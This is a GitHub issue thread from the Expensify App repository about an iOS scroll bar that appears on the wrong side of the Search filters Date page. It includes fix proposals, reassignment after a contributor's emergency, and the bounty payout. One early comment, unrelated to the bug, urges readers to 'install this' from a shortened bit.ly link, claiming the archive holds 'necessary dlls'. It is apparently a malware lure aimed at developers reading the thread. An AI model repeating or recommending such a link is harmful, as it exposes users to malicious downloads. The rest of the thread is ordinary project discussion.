### ISSUE TITLE
[$250] iOS - Scroll bar is moved to the left side and is overlapping with elements

### ISSUE THREAD

**Issue by izarutskaya** [Expensify/App#49456] opened 2024-09-19 10:24 UTC
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.38-0
**Reproducible in staging?:** Y
**Reproducible in production?:** Y
**Found when validation PR:** https://github.com/Expensify/App/pull/49239
**Logs:** https://stackoverflow.com/c/expensify/questions/4856
**Issue reported by:** Applause-Internal team

## Action Performed:
1. Open the app
2. Log in with any Gmail account
3. Tap on Navigate to Search - Filters - Date
4. Scroll up and down

## Expected Result:
Scroll bar should be on the right side of the app, next to the edge.

## Actual Result:
Scroll bar is moved to the left side and is overlapping with elements.

## Workaround:
Unknown

## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [ ] Android: Native
- [ ] Android: mWeb Chrome
- [x] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/cdb6f560-e52f-4054-bdd1-040a1d99d4df

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~021837166890649438945</li>
        <li>Upwork Job ID: 1837166890649438945</li>
        <li>Last Price Increase: 2024-09-20</li>
<li>Automatic offers: </li>
<ul>
<li>ishpaul777 | Contributor | 104058249</li>
<li>ChavdaSachin | Contributor | 104061970</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @ishpaul777</details>

**Comment by websquadpro** [comment] 2024-09-19 10:24
install this
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by izarutskaya** [comment] 2024-09-19 10:25
We think this issue might be related to the #collect project.

**Comment by ChavdaSachin** [comment] 2024-09-19 11:28
## Proposal

### Please re-state the problem that we are trying to solve in this issue.
- IOS scrollbar overlaps with content on - search > Filters > Date page.
### What is the root cause of that problem?
- https://github.com/Expensify/App/issues/48769#issue-2512440213
- Same RCA as above issue - migrating to `useOnyx` from `withOnyx` solves this problem.

### What changes do you think we should make in order to solve the problem?
- migrating [FormProvider](https://github.com/Expensify/App/blob/37bf6b2fef128786dfcd83257a56f56c0cd1eb3d/src/components/Form/FormProvider.tsx) and [SearchFiltersDatePage](https://github.com/Expensify/App/blob/37bf6b2fef128786dfcd83257a56f56c0cd1eb3d/src/pages/Search/SearchAdvancedFiltersPage/SearchFiltersDatePage.tsx) from `withOnyx` to `useOnyx` solves the issue.

### What alternative solutions did you explore? (Optional)

**Reminder:** Please use plain English, be brief and avoid jargon. Feel free to use images, charts or pseudo-code if necessary. Do not post large multi-line diffs or write walls of text. Do not create PRs unless you have been hired for this job.

**Comment by zfurtak** [comment] 2024-09-19 12:10
Hey! I’m Zuzanna Furtak from Software Mansion, an expert agency, and I’d like to work on this issue! Our team has been working on the search filters, so it should be a smooth process to debug them.

**Comment by abekkala** [comment] 2024-09-20 16:29
Not sure why Melvin unassigned you @ishpaul777 You are the reviewer on this one. 
@zfurtak will be creating a fix

**Comment by abekkala** [comment] 2024-09-20 16:52
Actually - @ishpaul777 can you first review the proposal that came in first. 

Because that one was submitted first can you see if it's acceptable? If not then I can asisgn zfurtak to take this on

**Comment by ChavdaSachin** [comment] 2024-09-20 17:13
@ishpaul777 I haven't completely implemented my solution, but I could do it.
but is there any chance this issue still could be assigned to me?

**Comment by ChavdaSachin** [comment] 2024-09-20 17:22
@ishpaul777 in a while I will share

**Comment by ChavdaSachin** [comment] 2024-09-20 19:24
Here's my test branch - https://github.com/ChavdaSachin/App/tree/fix-49456 (I took [FormWrapper](https://github.com/Expensify/App/blob/37bf6b2fef128786dfcd83257a56f56c0cd1eb3d/src/components/Form/FormWrapper.tsx) from https://github.com/Expensify/App/pull/49358)
>[!note]
>Issue is generally reproducible if date page is loading for the first time, easily reproducible on emulator

>Before 

https://github.com/user-attachments/assets/a60127ae-395a-43ff-9b08-50139da9966b 
>After

https://github.com/user-attachments/assets/6403e7f8-930d-4185-84af-8d5f75295a38

**Comment by chiragsalian** [comment] 2024-09-20 21:26
Cool lets do this. Feel free to create the PR @ChavdaSachin.

**Comment by ChavdaSachin** [comment] 2024-09-23 15:48
I will raise pr within 24 hrs

**Comment by ChavdaSachin** [comment] 2024-09-24 07:53
Today my friend met an accident and I am stuck in a medical emergency, I won't be able to work on this, please assign someone else for the job 🙏. Sorry for the delay caused.
Cc. @ishpaul777 @chiragsalian

**Comment by zfurtak** [comment] 2024-09-24 15:41
Hello, right now I have plenty of work but my colleague from swm @289Adam289 will take care of it first thing in the morning tomorrow

**Comment by chiragsalian** [comment] 2024-09-24 21:49
Sorry about your friend. I hope they are alright.
I've reassigned the issue to @289Adam289.

**Comment by 289Adam289** [comment] 2024-09-25 06:49
Hi! I am Adam from SWM, an expert agency and I'd like to work on this issue.

**Comment by 289Adam289** [comment] 2024-09-26 11:00
While working on this issue I've noticed that storybook is not working even on main. I think fixing it is outside of the scope of this pr and it may require opening another issue.

**Comment by chiragsalian** [comment] 2024-10-01 19:27
> Can we create a issue for this

Is it the same as the issue reported here - https://github.com/Expensify/App/issues/40041. Looks related right? And it looks like that issue is on hold for something else.

**Comment by abekkala** [comment] 2024-10-11 14:41
@lschurr I'm going ooo until Oct 20. Assigning a BZ buddy to this until I return and I can take it back

### STATUS: This is on HOLD with current discussion on how to get to a fix.

**Comment by chiragsalian** [comment] 2024-10-18 18:54
> the issue in OP is fixed, so this should be ready for payment.

Correct yes. Actually i just noticed the title has a HOLD on it. That's a mistake, clearing it.

> we were discussing a different issue that storybook is broken locally, so i beleive its not a priorty to fix since its broken on deployement. right?

Yup i agree too. The storybook is a different issue. Our most recent discussion is if the storybook issue should be merged with https://github.com/Expensify/App/issues/40041 or if a new issue should be created. This is a post discussion. The code to solve this GH issue is resolved and was live 3 weeks back. @lschurr or @abekkala, can you handle payment.

>  i think that is issue related with deployement of storybook, it should be running fine locally according to this

Weird, okay I've created another [issue](https://github.com/Expensify/App/issues/51108). Can you fill in the details when you get a chance @ishpaul777.

**Comment by abekkala** [comment] 2024-10-21 12:52
I'm back from ooo - unassigning @lschurr

**Comment by abekkala** [comment] 2024-10-30 20:08
Oh I just realized there was a payment comment prior to me unassigning @lschurr 

@ishpaul777 can you link the PR that fixed the OP here? 
I'd like to grab the names that require payment

**Comment by abekkala** [comment] 2024-10-31 14:43
### PAYMENT SUMMARY

Fix: @289Adam289 - swm, no upwork payment needed
PR Review: @ishpaul777 [$250] [Offer](https://www.upwork.com/nx/wm/offer/104679489)

**Comment by abekkala** [comment] 2024-11-14 20:06
@ishpaul777 the offer has not been accepted yet - can you accept so that payment can be issued?

**Comment by abekkala** [comment] 2024-11-19 13:56
@ishpaul777 payment sent and contract ended - thank you! 🎉

**Closed by abekkala** 2024-11-19 13:56 UTC
Labels: Reviewing, External, Daily, Bug
